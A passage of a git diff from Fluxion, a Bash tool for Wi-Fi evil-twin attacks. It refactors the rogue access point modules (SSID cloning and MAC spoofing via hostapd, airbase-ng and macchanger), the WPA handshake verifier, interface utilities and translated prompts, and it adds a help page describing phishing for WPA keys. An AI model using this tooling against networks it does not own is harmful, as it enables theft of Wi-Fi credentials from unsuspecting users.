use!" -FLUXIONSelectedBusyWITip="Run \"export FLUXIONWIKillProcesses=1\" before FLUXION to use it." +FLUXIONSelectedBusyWITip="This is usually caused by the network manager using the interface selected. We recommened you$CGrn gracefully stop the network manager$CClr or configure it to ignored the selected interface. Alternatively, run \"export FLUXIONWIKillProcesses=1\" before fluxion to kill it but we suggest you$CRed avoid using the killer flag${CClr}." FLUXIONGatheringWIInfoNotice="Gathering interface information..." FLUXIONUnknownWIDriverError="Unable to determine interface driver!" -FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to unload..." -FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to load..." +FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$interface\" to unload..." +FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$interface\" to load..." FLUXIONFindingConflictingProcessesNotice="Looking for notorious services..." FLUXIONKillingConflictingProcessesNotice="Killing notorious services..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's physical device!" FLUXIONStartingWIMonitorNotice="Starting monitor interface..." -FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." -FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" +FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" +FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" + + +FLUXIONIncompleteTargettingInfoNotice="Missing essid, bssid, or channel information!" + +FLUXIONTargettingAccessPointAboveNotice="Fluxion is targetting the access point above." + +FLUXIONContinueWithTargetQuery="Continue with this target?" + # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." @@ -29,8 +43,10 @@ FLUXIONScannerDetectedNothingNotice="No access points were detected, returning.. FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" -FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /.../dump-01.cap)" +FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /path/to/file.cap)" +FLUXIONPathToHandshakeFileReturnTip="To go back, leave the hash path blank." FLUXIONAbsolutePathInfo="Absolute path" +FLUXIONEmptyOrNonExistentHashError="${CRed}Error$CClr, path points to non-existing or empty hash file." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Select a channel to monitor" FLUXIONScannerChannelOptionAll="All channels" @@ -41,23 +57,23 @@ FLUXIONScannerChannelMiltipleTip="Multiple channels" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONAPServiceQuery="Select an access point service" -FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" -FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" -# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" -FLUXIONHashSourceRescanOption="Handshake directory (rescan)" +FLUXIONHashSourceRescanOption="Rescan handshake directory" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" +FLUXIONUseFoundHashOption="Use hash found" +FLUXIONSpecifyHashPathOption="Specify path to hash" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Select a wireless attack for the access point" -FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attack in progress..." +FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" FLUXIONGeneralExitOption="${CRed}Exit" FLUXIONGeneralRepeatOption="${CRed}Repeat" diff --git a/language/es.sh b/language/es.sh index 81e2faa..a2d0142 100755 --- a/language/es.sh +++ b/language/es.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="FLUXION Escáner" FLUXIONAPServiceQuery="Seleccione Opción de Ataque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recomendado$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Conexión más lenta$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" diff --git a/language/fr.sh b/language/fr.sh index c8a7a09..88156b8 100755 --- a/language/fr.sh +++ b/language/fr.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="Scanner FLUXION" FLUXIONAPServiceQuery="Sélectionnez une option d'attaque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommandé$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Connexion plus lente$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Sélectionnez une méthode de récupération de handshake" FLUXIONHashSourcePathOption="Chemin du fichier capturé" diff --git a/language/it.sh b/language/it.sh index 42d2a15..57fba2d 100755 --- a/language/it.sh +++ b/language/it.sh @@ -53,6 +53,7 @@ FLUXIONUseFoundHashQuery="Vuoi usare questo file?" FLUXIONHashVerificationMethodQuery="Seleziona il metodo di verifica dell'hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}raccomandato$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}inaffidabile$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Seleziona la tua scelta" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attacco in corso..." diff --git a/language/pl.sh b/language/pl.sh index b709a78..f8a08a9 100644 --- a/language/pl.sh +++ b/language/pl.sh @@ -31,6 +31,7 @@ FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" FLUXIONPathToHandshakeFileQuery="Podaj ścieżkę dostępu do pliku handshake $CClr(Example: /.../dump-01.cap)" FLUXIONAbsolutePathInfo="Absolute path" +FluxionRestartOption="Restart"s # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Wybierz kanał do monitorowania" FLUXIONScannerChannelOptionAll="Wszystkie kanały" diff --git a/language/pt-br.sh b/language/pt-br.sh index 64e01e3..4b31b86 100755 --- a/language/pt-br.sh +++ b/language/pt-br.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Sintetizando os resultados da varredura, aguarde..." FLUXIONScannerFailedNotice="Wireless card não suportado (sem APs encontrados)" FLUXIONScannerDetectedNothingNotice="Sem APs encontrados, retornando..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Arquivo hash não existe!" FLUXIONHashInvalidError="${CRed}Error$CClr, arquivo hash inválido!" diff --git a/language/ro.sh b/language/ro.sh index f60074c..23495b6 100755 --- a/language/ro.sh +++ b/language/ro.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/sk.sh b/language/sk.sh index 9cf48e6..e2663d7 100644 --- a/language/sk.sh +++ b/language/sk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Päť sekúnd po objavení sa cieľového AP, zavrite FLUXIONPreparingScannerResultsNotice="Výsledky scanu sa pripravujú, čakajte..." FLUXIONScannerFailedNotice="Bezdrôtová sieťová karta nemusí byť podporovaná (nenašli sa žiadne AP)" FLUXIONScannerDetectedNothingNotice="Žiadne prístupové body neboli najdené, vraciam sa..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Súbor 'hash' neexistuje!" FLUXIONHashInvalidError="${CRed}Error$CClr, nesprávny 'hash' súbor!" diff --git a/language/sl.sh b/language/sl.sh index 7749eea..4838b1f 100755 --- a/language/sl.sh +++ b/language/sl.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/tk.sh b/language/tk.sh index 6669584..781417b 100755 --- a/language/tk.sh +++ b/language/tk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/zh.sh b/language/zh.sh index 64d1cac..8f1da14 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash文件不存在!" FLUXIONHashInvalidError="${CRed}错误$CClr, 无效的Hash文件!" diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index ab7fb9f..cb12671 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh @@ -6,46 +6,49 @@ readonly HashUtilsVersion="1.0" HashOutputDevice="/dev/stdout" function hash_check_handshake() { - local handshakeVerifier=$1 - local handshakePath=$2 - local handshakeAPSSID=$3 - local handshakeAPMAC=$4 + local -r handshakeVerifier=$1 + local -r handshakePath=$2 + local -r handshakeAPSSID=$3 + local -r handshakeAPMAC=$4 - local analysis - local hashData + echo "Verifier Parameters: " > $HashOutputDevice + echo " Verifier: $handshakeVerifier" > $HashOutputDevice + echo "Hash Path: $handshakePath" > $HashOutputDevice + echo "Hash SSID: \"$handshakeAPSSID\"" > $HashOutputDevice + echo " Hash MAC: $handshakeAPMAC" > $HashOutputDevice - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" >$HashOutputDevice + local analysis # Since it's being used in all relevant instances. case "$handshakeVerifier" in - "pyrit") - readarray analysis < <(pyrit -r "$handshakePath" analyze 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: pyrit seems to be broken!" >$HashOutputDevice + "pyrit") + readarray analysis < <(pyrit -r "$handshakePath" analyze 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: pyrit seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") + + if [ "$hashMeta" ]; then + local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_(SHA[0-9]+_AES|MD5_RC4)/{ print \$0 }") + else + echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice + fi + ;; + "aircrack-ng") + readarray analysis < <(aircrack-ng "$handshakePath" 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: aircrack-ng seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") + ;; + *) + echo "Invalid verifier, quitting!" > $HashOutputDevice return 1 - fi - - local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") - - if [ "$hashMeta" ]; then - local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") - else - echo "No valid hash meta was found for \"$handshakeAPSSID\"" >$HashOutputDevice - fi - ;; - "aircrack-ng") - readarray analysis < <(aircrack-ng "$handshakePath" 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: aircrack-ng seems to be broken!" >$HashOutputDevice - return 1 - fi - - hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") - ;; - *) - echo "Invalid verifier, quitting!" - return 1 - ;; + ;; esac if [ -z "$hashData" ]; then @@ -53,18 +56,24 @@ function hash_check_handshake() { return 1 fi - local hashResult case "$handshakeVerifier" in - "pyrit") hashResult=$(echo "$hashData" | grep "good") ;; - "aircrack-ng") hashResult=$(echo "$hashData" | grep "(1 handshake)") ;; + "pyrit") + if echo "$hashData" | grep -qF "good"; then + local -r hashResult=1 + fi ;; + + "aircrack-ng") + if echo "$hashData" | grep -qE "\([0-9]+ handshake\)"; then + local -r hashResult=1 + fi ;; esac if [ -z "$hashResult" ]; then - echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="invalid" return 1 else - echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="valid" fi } diff --git a/lib/Help.sh b/lib/Help.sh new file mode 100644 index 0000000..9ffdb99 --- /dev/null +++ b/lib/Help.sh @@ -0,0 +1,96 @@ +#!/bin/bash + +function fluxion_help{ + echo " FLUXION(1) User Manuals FLUXION(1) + + + + NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + + SYNOPSIS + fluxion [-debug] [-l language ] attack ... + + DESCRIPTION + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. + + OPTIONS + -v Print version number. + + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. + + FILES + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. + + ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. + + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + + DIAGNOSTICS + Please checkout the other log files or use the debug mode. + + BUGS + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues + + AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + + SEE ALSO + aircrack-ng(8), + + + Linux MARCH 2018 FLUXION(1)" + +} diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index 75a8ed9..9156c19 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh @@ -11,22 +11,20 @@ if [ -d /sys/bus/usb ] # && hash lsusb; then InterfaceUSBBus=1 fi -if [ -d /sys/bus/pci ] || [ -d /sys/bus/pci_express ] || [ -d /proc/bus/pci ] # && hash lspci; +if [ -d /sys/bus/pci -o -d /sys/bus/pci_express -o -d /proc/bus/pci ] # && hash lspci; then InterfacePCIBus=1 fi # Checks if the interface belongs to a physical device. function interface_is_real() { - if [ -d /sys/class/net/$1/device ]; then return 0 - else return 1 - fi + test -d /sys/class/net/$1/device + return $? } # Checks if the interface belongs to a wireless device. function interface_is_wireless() { - if grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent; then return 0 - else return 1 - fi + grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent + return $? } # Returns an array of absolutely all interfaces. @@ -146,64 +144,39 @@ function interface_state() { function interface_set_state() { if [ "${#@}" -ne 2 ]; then return 1; fi + # TODO: Add alternatives to 'ip' in case of failure. ip link set "$1" "$2" + return $? } function interface_set_mode() { if [ "${#@}" -ne 2 ]; then return 1; fi if ! interface_set_state "$1" "down"; then return 2; fi - if ! iwconfig "$1" mode "$2" &>$InterfaceUtilsOutputDevice; then return 3; fi + if ! iw dev "$1" set type "$2" &> $InterfaceUtilsOutputDevice; then + if ! iwconfig "$1" mode "$2" &> $InterfaceUtilsOutputDevice + then return 3 + fi + fi if ! interface_set_state "$1" "up"; then return 4; fi } -function interface_prompt() { - if [ -z "$1" -o -z "$2" ]; then return 1; fi - - local __interface_prompt__ifAvailable=("${!2}") - local __interface_prompt__ifAvailableInfo=() - local __interface_prompt__ifAvailableColor=() - local __interface_prompt__ifAvailableState=() - - local __interface_prompt__ifCandidate - for __interface_prompt__ifCandidate in "${__interface_prompt__ifAvailable[@]}"; do - interface_chipset "$__interface_prompt__ifCandidate" - __interface_prompt__ifAvailableInfo+=("$InterfaceChipset") - - interface_state "$__interface_prompt__ifCandidate" - - if [ "$InterfaceState" = "up" ]; then - __interface_prompt__ifAvailableColor+=("$CPrp") - __interface_prompt__ifAvailableState+=("[-]") - else - __interface_prompt__ifAvailableColor+=("$CClr") - __interface_prompt__ifAvailableState+=("[+]") - fi - done - - # The following conditional is required since io_query_format_fields - # only considers the the size of the first parameter, available color. - if [ "$6" ]; then # Add alternative choices - __interface_prompt__ifAvailable+=("${!3}") - __interface_prompt__ifAvailableInfo+=("${!4}") - __interface_prompt__ifAvailableState+=("${!5}") - __interface_prompt__ifAvailableColor+=("${!6}") +function interface_reidentify() { + if [ ${#@} -ne 2 ]; then return 1; fi + + local -r __interface_reidentify__oldIdentifier=$1 + local -r __interface_reidentify__newIdentifier=$2 + + if [[ $__interface_reidentify__newIdentifier == *" "* ]] + then return 2 fi - - # If only one interface exists and it's available, choose it. - if [ "${#__interface_prompt__ifAvailable[@]}" -eq 1 -a "${__interface_prompt__ifAvailableState[0]}" = "[+]" ]; then - InterfacePromptWISelected="${__interface_prompt__ifAvailable[0]}" - InterfacePromptWISelectedState="[+]" # It passed the condition, it must be + - InterfacePromptWISelectedInfo="${__interface_prompt__ifAvailableInfo[0]}" - else - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields "$1" "$FormatApplyAutosize" \ - __interface_prompt__ifAvailableColor[@] __interface_prompt__ifAvailable[@] \ - __interface_prompt__ifAvailableState[@] __interface_prompt__ifAvailableInfo[@] - - echo - - InterfacePromptIfSelected="${IOQueryFormatFields[1]}" - InterfacePromptIfSelectedState="${IOQueryFormatFields[2]}" - InterfacePromptWISelectedInfo="${IOQueryFormatFields[3]}" + + if ! interface_set_state $__interface_reidentify__oldIdentifier down + then return 3 fi + + # TODO: Add alternatives to 'ip' in case of failure. + ip link set $__interface_reidentify__oldIdentifier name $__interface_reidentify__newIdentifier + return $? } + +# FLUXSCRIPT END diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 802e3e4..c32c58f 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh @@ -3,55 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW="at0" -VIAP=$WIAccessPoint - -# airbase-ng uses a monitor-mode virtual interface -# and creates a separate interface, atX, for dhcpd. -VIAPAddress="$VIGWNetwork.2" - -# APServiceConfigDirectory=$FLUXIONWorkspacePath +#APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" } -function ap_route() { - ifconfig $VIAP $VIAPAddress netmask 255.255.255.0 - sysctl net.ipv6.conf.at0.disable_ipv6=1 &>$FLUXIONOutputDevice +function ap_service_route() { + local networkSubnet=${APServiceInterfaceAddress%.*} + local networkAddress=$(( ( ${APServiceInterfaceAddress##*.} + 1 ) % 255 )) + + if [ $hostID -eq 0 ]; then + let hostID++ + fi + + # TODO: Dynamically get the airbase-ng tap interface & use below. + # WARNING: Notice the interface below is STATIC, it'll break eventually! + if ! ifconfig "at0" $networkSubnet.$networkAddress \ + netmask 255.255.255.0; then + return 1 + fi + + if ! sysctl net.ipv6.conf.at0.disable_ipv6=1 &> $FLUXIONOutputDevice; then + return 2 + fi } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Spoof virtual interface MAC address. # This is done by airbase-ng automatically. + + # airbase-ng uses a monitor-mode virtual interface + # and creates a separate interface, atX, for dhcpd. + APServiceAccessInterface="at0" } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [airbase-ng]" -e airbase-ng -P -e $APTargetSSID -c $APTargetChannel -a $APRogueMAC $VIAP & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [airbase-ng]" -e \ + airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + -a $APServiceMAC $APServiceInterface & local parentPID=$! - # Wait till airebase-ng has started and created the extra virtual interface. + # Wait till airebase-ng starts and creates the extra virtual interface. while [ ! "$APServicePID" ]; do sleep 1 APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/lib/ap/hostapd.sh b/lib/ap/hostapd.sh index 14d26c9..93438ed 100755 --- a/lib/ap/hostapd.sh +++ b/lib/ap/hostapd.sh @@ -3,69 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW=$WIAccessPoint -VIAP=$WIAccessPoint - -# HostAPD sets the virtual interface mode -# to master, which is supported by dhcpd. -VIAPAddress=$VIGWAddress - APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop # Reset MAC address to original. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger -p $VIAP &>$FLUXIONOutputDevice + macchanger -p $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" + } -function ap_route() { - echo "APService: No custom routes for hostapd" >$FLUXIONOutputDevice +function ap_service_route() { + echo "APService: No custom routes for hostapd" > $FLUXIONOutputDevice } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Prepare the hostapd config file. echo "\ -interface=$VIAP +interface=$APServiceInterface driver=nl80211 -ssid=$APTargetSSID -channel=$APTargetChannel" >"$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" +ssid=$APServiceSSID +channel=$APServiceChannel" \ + > "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" # Spoof virtual interface MAC address. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger --mac=$APRogueMAC $VIAP &>$FLUXIONOutputDevice + macchanger --mac=$APServiceMAC $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + # HostAPD sets the virtual interface mode + # to master, which is supported by dhcpd. + APServiceAccessInterface=$APServiceInterface } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [hostapd]" -e hostapd "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [hostapd]" -e \ + hostapd "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" & local parentPID=$! # Wait till hostapd has started and its virtual interface is ready. @@ -74,7 +92,7 @@ function ap_start() { APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/misc/README.md b/misc/README.md new file mode 100644 index 0000000..5469cf4 --- /dev/null +++ b/misc/README.md @@ -0,0 +1,19 @@ +## Arguments table + +| Arguments | Describtion | +| ------------- | ------------- | +| -a | Give a Attack | +| -e | Give a certain essid | +| -b | Give a certain bssid | +| -- | Maker is required | +| -a | Access point interface | +| -j | Jamming interface | +| -x | Use xterm instead of tmux | +| -v | Print version number | +| -d | Run fluxion in debug mode | +| -k | Kill wireless connection if it is connected | +| -m | Run fluxion in manual mode instead of auto | +| -l | Language | + +## Samples +`./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] -- -a [AP INTERFACE] -j [JAMMING INTERFACE]` diff --git a/preferences/.gitkeep b/preferences/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/scripts/debug.sh b/scripts/debug.sh index 